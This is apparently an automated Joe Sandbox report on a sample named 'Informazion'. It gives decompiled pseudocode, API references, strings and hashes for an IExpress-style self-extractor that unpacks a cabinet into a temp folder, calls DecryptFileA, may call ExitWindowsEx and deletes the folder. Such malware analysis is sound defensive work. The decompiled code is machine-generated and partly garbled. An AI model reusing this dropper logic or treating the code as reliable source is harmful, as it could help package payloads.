0x7ff64c516f2a
0x7ff64c516f32
0x7ff64c516f34
0x7ff64c516f3c
0x7ff64c516f41
0x7ff64c516f49
0x7ff64c516f4d
0x7ff64c516f52
0x7ff64c516f54
0x7ff64c516f5e
0x7ff64c516f68
0x7ff64c516f6c
0x7ff64c516f71
0x7ff64c516f7b
0x7ff64c516f81
0x7ff64c516f8d
0x7ff64c516f92
0x7ff64c516f95
0x7ff64c516f98
0x7ff64c516f9c
0x7ff64c516fa7
0x7ff64c516fac
0x7ff64c516fbd
0x7ff64c516fc2
0x7ff64c516fc9
0x7ff64c516fd3
0x7ff64c516fdd
0x7ff64c51701a

APIs

GetCurrentDirectoryA.KERNEL32 ref: 00007FF64C516CEE
SetCurrentDirectoryA.KERNELBASE ref: 00007FF64C516CFD
GetDiskFreeSpaceA.KERNELBASE ref: 00007FF64C516D6C
MulDiv.KERNEL32 ref: 00007FF64C516D98
GetVolumeInformationA.KERNELBASE ref: 00007FF64C516DD6
memset.MSVCRT ref: 00007FF64C516DF4
GetLastError.KERNEL32 ref: 00007FF64C516E04
FormatMessageA.KERNEL32 ref: 00007FF64C516E2F
SetCurrentDirectoryA.KERNEL32 ref: 00007FF64C516FDD

Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0

Part of subcall function 00007FF64C517700: GetLastError.KERNEL32 ref: 00007FF64C517704

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C516CBA

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 4237285672-305352358
Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
Instruction ID: 97c6586886872791cd033a46ea08e07223d3f7037e853caa9a4e5f93f9a428f7
Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
Instruction Fuzzy Hash: 52A17036E1C64186E728BF28E4486AEBFA1FB89744F444136DA5D83B58DF3DD865CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C515D90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD

FindResourceA.KERNEL32 ref: 00007FF64C515DC0
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF64C513300), ref: 00007FF64C515DD1
LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF64C513300), ref: 00007FF64C515DE0
GetDlgItem.USER32 ref: 00007FF64C515E0D
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF64C513300), ref: 00007FF64C515E1E
GetDlgItem.USER32 ref: 00007FF64C515E36
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF64C513300), ref: 00007FF64C515E4A
#20.CABINET ref: 00007FF64C515EBD
#22.CABINET ref: 00007FF64C515F03
#23.CABINET ref: 00007FF64C515F18
FreeResource.KERNEL32 ref: 00007FF64C515F61
SendMessageA.USER32 ref: 00007FF64C515FC3

Strings

CABINET, xrefs: 00007FF64C515D9D, 00007FF64C515DB7
*MEMCAB, xrefs: 00007FF64C515EF4

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
Instruction ID: 20fd9b874f3e82e2673375a6bed93892cc321c5416476b558ff212b5d7a41af9
Opcode Fuzzy Hash: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
Instruction Fuzzy Hash: DA510471E1CB4286EB18BF18E8882BD7FA0FB89745F858136D96E82754DF3DE064C600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5130EC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00007FF67FF64C5130EC(long long __rbx, long long _a8) {
				signed int _v24;
				char _v296;
				char _v568;
				intOrPtr _v576;
				intOrPtr _v584;
				void* __rdi;
				void* _t11;
				void* _t14;
				void* _t28;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t38;
				intOrPtr _t44;
				intOrPtr _t45;
				signed long long _t48;
				signed long long _t49;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t70;
				void* _t72;
				void* _t73;
				void* _t74;

				_t50 = __rbx;
				_a8 = __rbx;
				_t48 =  *0x4c51c008; // 0xdeba5460e397
				_t49 = _t48 ^ _t67 - 0x00000260;
				_v24 = _t49;
				_t35 =  *0x4c51cd18; // 0x0
				if (_t35 != 0) goto 0x4c513141;
				_t36 =  *0x4c51cd04; // 0x0
				if (_t36 != 0) goto 0x4c513134; // executed
				_t11 = E00007FF67FF64C5160A4(_t49, __rbx, _t62, _t65, _t66, _t70, _t72, _t73); // executed
				if (_t11 == 0) goto 0x4c513236;
				_t38 =  *0x4c51cd18; // 0x0
				if (_t38 != 0) goto 0x4c513141;
				if (E00007FF67FF64C513F74(_t49) == 0) goto 0x4c513236;
				if (E00007FF67FF64C515FE4(_t28, _t50, _t65, _t66, _t72, _t73) == 0) goto 0x4c513236; // executed
				_t14 = E00007FF67FF64C5166C4(0, _t50, _t62, _t64, _t65, _t70, _t72, _t73, _t74); // executed
				if (_t14 == 0) goto 0x4c513236;
				GetSystemDirectoryA(??, ??);
				E00007FF67FF64C517BA8(0x105, _t49, _t50,  &_v568, _t65, _t66, "advapi32.dll");
				LoadLibraryA(??);
				if (_t49 == 0) goto 0x4c5131c9;
				GetProcAddress(??, ??);
				if (_t49 == 0) goto 0x4c5131c9;
				 *0x4c519650(); // executed
				FreeLibrary(??);
				_t44 =  *0x4c51cd04; // 0x0
				if (_t44 != 0) goto 0x4c513273;
				_t45 =  *0x4c51de60; // 0x0
				if (_t45 != 0) goto 0x4c513273;
				if (GetWindowsDirectoryA(??, ??) != 0) goto 0x4c51325a;
				r9d = 0;
				_v576 = 0;
				r8d = 0;
				_v584 = 0x10;
				E00007FF67FF64C514DCC( &_v296, "advapi32.dll", _t72, _t73);
				 *0x4c51d544 = E00007FF67FF64C517700();
				return E00007FF67FF64C518470(0, 0, _v24 ^ _t67 - 0x00000260);
			}

0x7ff64c5130ec
0x7ff64c5130ec
0x7ff64c5130f9
0x7ff64c513100
0x7ff64c513103
0x7ff64c51310d
0x7ff64c513114
0x7ff64c513116
0x7ff64c51311c
0x7ff64c51311e
0x7ff64c513125
0x7ff64c51312b
0x7ff64c513132
0x7ff64c51313b
0x7ff64c513148
0x7ff64c51314e
0x7ff64c513155
0x7ff64c513167
0x7ff64c513181
0x7ff64c51318b
0x7ff64c51319d
0x7ff64c5131a9
0x7ff64c5131b8
0x7ff64c5131c3
0x7ff64c5131cc
0x7ff64c5131d8
0x7ff64c5131de
0x7ff64c5131e4
0x7ff64c5131ea
0x7ff64c51320b
0x7ff64c513212
0x7ff64c513215
0x7ff64c513219
0x7ff64c51321c
0x7ff64c513226
0x7ff64c513230
0x7ff64c513258

APIs

GetSystemDirectoryA.KERNEL32 ref: 00007FF64C513167
LoadLibraryA.KERNEL32 ref: 00007FF64C51318B
GetProcAddress.KERNEL32 ref: 00007FF64C5131A9
DecryptFileA.ADVAPI32 ref: 00007FF64C5131C3
FreeLibrary.KERNEL32 ref: 00007FF64C5131CC
GetWindowsDirectoryA.KERNEL32 ref: 00007FF64C5131FD

Part of subcall function 00007FF64C5160A4: LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF64C513123), ref: 00007FF64C5160C9

Strings

DecryptFileA, xrefs: 00007FF64C51319F
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C5131BC, 00007FF64C513273
advapi32.dll, xrefs: 00007FF64C513173

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 3010855178-1173327654
Opcode ID: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
Instruction ID: ed11de111fb9f947d038ca11514017e970e4fee3103bf8dd80712d8dc2173b38
Opcode Fuzzy Hash: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
Instruction Fuzzy Hash: B8712A20E0C68386FB69BF1DA86927D3EA4AF94750F444037D9BDC2395DF2CE864C600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5164E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00007FF67FF64C5164E4(void* __edx, long long __rbx, void* __rcx, long long __rsi, void* __r8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v296;
				signed short _v344;
				void* __rdi;
				void* _t20;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t25;
				signed int _t27;
				void* _t33;
				signed int _t34;
				intOrPtr _t49;
				signed int _t52;
				intOrPtr _t55;
				void* _t61;
				signed long long _t63;
				char* _t89;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t107;
				void* _t109;

				_t93 = __rsi;
				_a16 = __rbx;
				_a24 = __rsi;
				_t63 =  *0x4c51c008; // 0xdeba5460e397
				_v24 = _t63 ^ _t96 - 0x00000170;
				_t107 = __rcx;
				if (__edx == 0) goto 0x4c5165df;
				_t4 =  &_v296; // 0x144, executed
				_t89 = _t4;
				_t20 = E00007FF67FF64C5163B8(__rbx, __rcx, _t89, __rcx, _t109); // executed
				if (_t20 == 0) goto 0x4c516688;
				_t5 =  &_v296; // 0x144
				_t6 = _t89 + 0x7ffffefa; // 0x7ffffffe
				if (_t6 == 0) goto 0x4c516560;
				_t21 =  *((intOrPtr*)(_t5 - 0x4c51d610 + 0x4c51d610));
				_t49 = _t21;
				if (_t49 == 0) goto 0x4c516560;
				 *0x4c51d610 = _t21;
				if (_t49 != 0) goto 0x4c516541;
				_t67 =  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f;
				 *((char*)(0x7ff64c51d60f)) = 0;
				if (( *0x4c51de64 & 0x00000020) == 0) goto 0x4c5165cc;
				GetSystemInfo(??);
				_t34 = _v344 & 0x0000ffff;
				_t52 = _t34;
				if (_t52 == 0) goto 0x4c5165bb;
				if (_t52 == 0) goto 0x4c5165b2;
				if (_t52 == 0) goto 0x4c5165a9;
				if (_t34 != 1) goto 0x4c5165cc;
				goto 0x4c5165c2;
				goto 0x4c5165c2;
				goto 0x4c5165c2;
				E00007FF67FF64C517BA8(0x104,  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f, 0x4c51d610, 0x4c51d610, __rsi, _t95, "i386");
				E00007FF67FF64C517BA8(0x104,  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f, 0x4c51d610, 0x4c51d610, _t93, _t95, 0x4c519700);
				goto 0x4c51661e;
				_t13 = _t91 + 0x7ffffefa; // 0x7ffffffe
				if (_t13 == 0) goto 0x4c516610;
				_t24 =  *((intOrPtr*)(_t107 - 0x4c51d610 + 0x4c51d610));
				_t55 = _t24;
				if (_t55 == 0) goto 0x4c516610;
				 *0x4c51d610 = _t24;
				if (_t55 != 0) goto 0x4c5165f1;
				_t70 =  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f;
				 *((char*)(0x7ff64c51d60f)) = 0;
				_t25 = E00007FF67FF64C516B70(_t33,  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f, 0x4c51d610, 0x4c51d610, _t93, _t95); // executed
				if (_t25 != 0) goto 0x4c516649;
				if (CreateDirectoryA(??, ??) == 0) goto 0x4c51667d;
				 *0x4c51cd00 = 1;
				if (r8d == 0) goto 0x4c51668c;
				r8d = 0;
				_t27 = E00007FF67FF64C516CA4(r8d, 0x4c51d610, 0x4c51d610, _t91 - 1, _t93, 0x4c519700, _t107 - 0x4c51d610, _t109); // executed
				if (_t27 != 0) goto 0x4c51668c;
				_t61 =  *0x4c51cd00 - _t27; // 0x0
				if (_t61 == 0) goto 0x4c516688;
				 *0x4c51cd00 =  *0x4c51cd00 & _t27;
				RemoveDirectoryA(??);
				goto 0x4c516688;
				 *0x4c51d544 = E00007FF67FF64C517700();
				goto 0x4c516698;
				 *0x4c51d544 =  *0x4c51d544 & 0x00000000;
				return E00007FF67FF64C518470(1, _t34, _v24 ^ _t96 - 0x00000170);
			}

0x7ff64c5164e4
0x7ff64c5164e4
0x7ff64c5164e9
0x7ff64c5164f6
0x7ff64c516500
0x7ff64c51650b
0x7ff64c516510
0x7ff64c516516
0x7ff64c516516
0x7ff64c51651b
0x7ff64c516522
0x7ff64c516534
0x7ff64c516541
0x7ff64c51654b
0x7ff64c51654d
0x7ff64c516551
0x7ff64c516553
0x7ff64c516555
0x7ff64c51655e
0x7ff64c516567
0x7ff64c51656b
0x7ff64c516575
0x7ff64c51657c
0x7ff64c516588
0x7ff64c51658d
0x7ff64c51658f
0x7ff64c516594
0x7ff64c516599
0x7ff64c51659e
0x7ff64c5165a7
0x7ff64c5165b0
0x7ff64c5165b9
0x7ff64c5165c7
0x7ff64c5165d8
0x7ff64c5165dd
0x7ff64c5165f1
0x7ff64c5165fb
0x7ff64c5165fd
0x7ff64c516601
0x7ff64c516603
0x7ff64c516605
0x7ff64c51660e
0x7ff64c516617
0x7ff64c51661b
0x7ff64c516621
0x7ff64c516628
0x7ff64c51663d
0x7ff64c51663f
0x7ff64c51664b
0x7ff64c51664d
0x7ff64c516655
0x7ff64c51665c
0x7ff64c51665e
0x7ff64c516664
0x7ff64c516666
0x7ff64c51666f
0x7ff64c51667b
0x7ff64c516682
0x7ff64c51668a
0x7ff64c51668c
0x7ff64c5166bc

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF64C512CE1), ref: 00007FF64C51657C
CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF64C512CE1), ref: 00007FF64C51662F
RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF64C512CE1), ref: 00007FF64C51666F

Part of subcall function 00007FF64C5163B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF64C512CE1), ref: 00007FF64C516423
Part of subcall function 00007FF64C5163B8: GetFileAttributesA.KERNELBASE ref: 00007FF64C516432
Part of subcall function 00007FF64C5163B8: GetTempFileNameA.KERNEL32 ref: 00007FF64C51645B
Part of subcall function 00007FF64C5163B8: DeleteFileA.KERNEL32 ref: 00007FF64C516473
Part of subcall function 00007FF64C5163B8: CreateDirectoryA.KERNEL32 ref: 00007FF64C516484

Strings

mips, xrefs: 00007FF64C5165B2
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C516528, 00007FF64C5165DF
alpha, xrefs: 00007FF64C5165A9
i386, xrefs: 00007FF64C5165BB
ppc, xrefs: 00007FF64C5165A0

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3374052426
Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
Instruction ID: b6fddfa05a82f7789178e2ea8f7528a38c5dc90349086c1647f1c96eda35415d
Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
Instruction Fuzzy Hash: BF518F21E0D78285FA59BF2DA8182BD6FA4EF45780F994137C96E83395DF7DE824C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C512C54 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
libraryloadershutdownCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E00007FF67FF64C512C54(void* __rax, long long __rbx, long long __rcx, long long __rsi, long long __r8, long long _a8, long long _a16) {
				intOrPtr _v16;
				intOrPtr _v24;
				long _t15;
				void* _t20;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t45;
				intOrPtr _t48;
				signed short _t52;
				intOrPtr _t62;
				long long _t64;
				void* _t73;
				void* _t74;

				_a8 = __rbx;
				_a16 = __rsi;
				_t56 = __r8;
				_t15 = GetVersion();
				if (_t15 < 0) goto 0x4c512cc3;
				if (_t15 - 6 < 0) goto 0x4c512cc3;
				GetModuleHandleW(??);
				if (__rax == 0) goto 0x4c512cc3;
				GetProcAddress(??, ??);
				if (__rax == 0) goto 0x4c512cc3;
				r9d = 0;
				r8d = 0;
				 *0x4c519650();
				_t64 = __r8;
				 *0x4c51d544 = 0;
				_t61 = __rcx;
				if (E00007FF67FF64C512DB4(__r8, __rcx, __r8) == 0) goto 0x4c512d7f; // executed
				_t20 = E00007FF67FF64C5130EC(_t56); // executed
				E00007FF67FF64C5161EC(_t56, _t64); // executed
				if (_t20 == 0) goto 0x4c512d7f;
				_t45 =  *0x4c51cd1a - sil; // 0x0
				if (_t45 != 0) goto 0x4c512d7f;
				if ((dil & 0x00000001) == 0) goto 0x4c512d7f;
				if ((dil & 0x00000002) != 0) goto 0x4c512d2d;
				_t48 =  *0x4c51d540; // 0x0
				if (_t48 != 0) goto 0x4c512d2d;
				_t29 =  *0x4c51de7c; // 0x0
				if (_t29 == E00007FF67FF64C512318( *0x4c51de78 & 0x0000ffff, _t56)) goto 0x4c512d7f;
				if ((dil & 0x00000004) != 0) goto 0x4c512d5e;
				_v16 = 4;
				r9d = 0;
				_v24 = 0x40;
				if (E00007FF67FF64C514DCC(_t61, 0x4c519700, _t73, _t74) != 6) goto 0x4c512d7f;
				_t52 =  *0x4c51de78; // 0x3
				if (_t52 != 0) goto 0x4c512d7a;
				ExitWindowsEx(??, ??);
				goto 0x4c512d7f;
				E00007FF67FF64C511C0C();
				_t62 =  *0x4c51c830; // 0x0
				if (_t62 == 0) goto 0x4c512d97;
				CloseHandle(??);
				_t27 =  *0x4c51d544; // 0x0
				return _t27;
			}

0x7ff64c512c54
0x7ff64c512c59
0x7ff64c512c63
0x7ff64c512c69
0x7ff64c512c79
0x7ff64c512c7d
0x7ff64c512c86
0x7ff64c512c95
0x7ff64c512ca1
0x7ff64c512cb0
0x7ff64c512cb2
0x7ff64c512cb8
0x7ff64c512cbd
0x7ff64c512cc3
0x7ff64c512cc6
0x7ff64c512ccc
0x7ff64c512cd6
0x7ff64c512cdc
0x7ff64c512ce3
0x7ff64c512cea
0x7ff64c512cf0
0x7ff64c512cf7
0x7ff64c512d07
0x7ff64c512d0d
0x7ff64c512d0f
0x7ff64c512d15
0x7ff64c512d1e
0x7ff64c512d2b
0x7ff64c512d31
0x7ff64c512d33
0x7ff64c512d42
0x7ff64c512d45
0x7ff64c512d5c
0x7ff64c512d5e
0x7ff64c512d65
0x7ff64c512d6c
0x7ff64c512d78
0x7ff64c512d7a
0x7ff64c512d7f
0x7ff64c512d89
0x7ff64c512d8b
0x7ff64c512d97
0x7ff64c512dac

APIs

GetVersion.KERNEL32 ref: 00007FF64C512C69
GetModuleHandleW.KERNEL32 ref: 00007FF64C512C86
GetProcAddress.KERNEL32 ref: 00007FF64C512CA1
ExitWindowsEx.USER32 ref: 00007FF64C512D6C
CloseHandle.KERNEL32 ref: 00007FF64C512D8B

Strings

Kernel32.dll, xrefs: 00007FF64C512C7F
@, xrefs: 00007FF64C512D45
HeapSetInformation, xrefs: 00007FF64C512C97

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Handle$AddressCloseExitModuleProcVersionWindows
String ID: @$HeapSetInformation$Kernel32.dll
API String ID: 1302179841-1204263913
Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
Instruction ID: 4147dbd7afd34ac138e8e3ea94c44f8dbef928292f3d54ba86770ee9e9544747
Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
Instruction Fuzzy Hash: 4E313A31E1CA4286FB6DBF28F84827D7EA0AF59B54F444137DA2DC2399DF2CE4618640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C51204C Relevance: 12.1, APIs: 8, Instructions: 119
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00007FF67FF64C51204C(long long __rbx, char* __rcx, void* __rdx, long long __rsi) {
				void* __rbp;
				char _t35;
				char _t38;
				int _t47;
				int _t49;
				void* _t51;
				char _t57;
				char _t61;
				signed long long _t68;
				char* _t73;
				void* _t78;
				char* _t81;
				char* _t103;
				void* _t104;
				CHAR* _t110;
				CHAR* _t116;
				void* _t117;
				void* _t119;
				signed long long _t120;
				CHAR* _t129;

				 *((long long*)(_t119 + 0x10)) = __rbx;
				 *((long long*)(_t119 + 0x18)) = __rsi;
				_t117 = _t119 - 0x180;
				_t120 = _t119 - 0x280;
				_t68 =  *0x4c51c008; // 0xdeba5460e397
				 *(_t117 + 0x170) = _t68 ^ _t120;
				if ( *__rcx == 0) goto 0x4c512213;
				r15d = 0x104;
				_t81 = _t117 + 0x60;
				_t78 = __rcx - _t117 + 0x60;
				if (__rdx + 0x7ffffefa == 0) goto 0x4c5120bb;
				_t35 =  *((intOrPtr*)(_t78 + _t81));
				_t57 = _t35;
				if (_t57 == 0) goto 0x4c5120bb;
				 *_t81 = _t35;
				if (_t57 != 0) goto 0x4c51209d;
				_t73 =  !=  ? _t81 + 1 : _t81 + 1 - 1;
				 *_t73 = 0;
				E00007FF67FF64C511084(_t117 + 0x60, _t129, "*");
				FindFirstFileA(_t129); // executed
				if (_t73 == 0xffffffff) goto 0x4c512213;
				_t103 = _t117 + 0x60;
				if ( &(_t129[0x7ffffefa]) == 0) goto 0x4c512123;
				_t38 =  *((intOrPtr*)(_t78 + _t103));
				_t61 = _t38;
				if (_t61 == 0) goto 0x4c512123;
				 *_t103 = _t38;
				_t104 = _t103 + 1;
				if (_t61 != 0) goto 0x4c512105;
				_t75 =  !=  ? _t104 : _t104 - 1;
				 *((char*)( !=  ? _t104 : _t104 - 1)) = 0;
				if (( *(_t120 + 0x20) & 0x00000010) == 0) goto 0x4c5121a3;
				if (lstrcmpA(_t110) == 0) goto 0x4c5121d9;
				if (lstrcmpA(_t116) == 0) goto 0x4c5121d9;
				E00007FF67FF64C511084(_t117 + 0x60, _t129, _t120 + 0x4c);
				E00007FF67FF64C517BA8(r15d,  !=  ? _t104 : _t104 - 1, _t78, _t117 + 0x60, _t73, _t117, 0x4c519700);
				E00007FF67FF64C51204C(_t78, _t117 + 0x60, _t129, _t73);
				goto 0x4c5121d9;
				E00007FF67FF64C511084(_t117 + 0x60, _t129, _t120 + 0x4c);
				SetFileAttributesA(??, ??); // executed
				DeleteFileA(??); // executed
				_t47 = FindNextFileA(??, ??); // executed
				if (_t47 != 0) goto 0x4c5120fe;
				FindClose(??);
				_t49 = RemoveDirectoryA(??); // executed
				return E00007FF67FF64C518470(_t49, _t51,  *(_t117 + 0x170) ^ _t120);
			}

0x7ff64c51204c
0x7ff64c512051
0x7ff64c51205a
0x7ff64c512062
0x7ff64c512069
0x7ff64c512073
0x7ff64c512080
0x7ff64c512086
0x7ff64c512093
0x7ff64c51209a
0x7ff64c5120a7
0x7ff64c5120a9
0x7ff64c5120ac
0x7ff64c5120ae
0x7ff64c5120b0
0x7ff64c5120b9
0x7ff64c5120cc
0x7ff64c5120d4
0x7ff64c5120d7
0x7ff64c5120e5
0x7ff64c5120f8
0x7ff64c512101
0x7ff64c51210f
0x7ff64c512111
0x7ff64c512114
0x7ff64c512116
0x7ff64c512118
0x7ff64c51211a
0x7ff64c512121
0x7ff64c51212a
0x7ff64c512133
0x7ff64c512136
0x7ff64c512152
0x7ff64c512172
0x7ff64c512180
0x7ff64c512193
0x7ff64c51219c
0x7ff64c5121a1
0x7ff64c5121af
0x7ff64c5121bd
0x7ff64c5121cd
0x7ff64c5121e1
0x7ff64c5121ef
0x7ff64c5121f8
0x7ff64c512207
0x7ff64c512239

APIs

FindFirstFileA.KERNELBASE ref: 00007FF64C5120E5
lstrcmpA.KERNEL32 ref: 00007FF64C512144
lstrcmpA.KERNEL32 ref: 00007FF64C512164
SetFileAttributesA.KERNELBASE ref: 00007FF64C5121BD
DeleteFileA.KERNELBASE ref: 00007FF64C5121CD
FindNextFileA.KERNELBASE ref: 00007FF64C5121E1
FindClose.KERNEL32 ref: 00007FF64C5121F8
RemoveDirectoryA.KERNELBASE ref: 00007FF64C512207

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
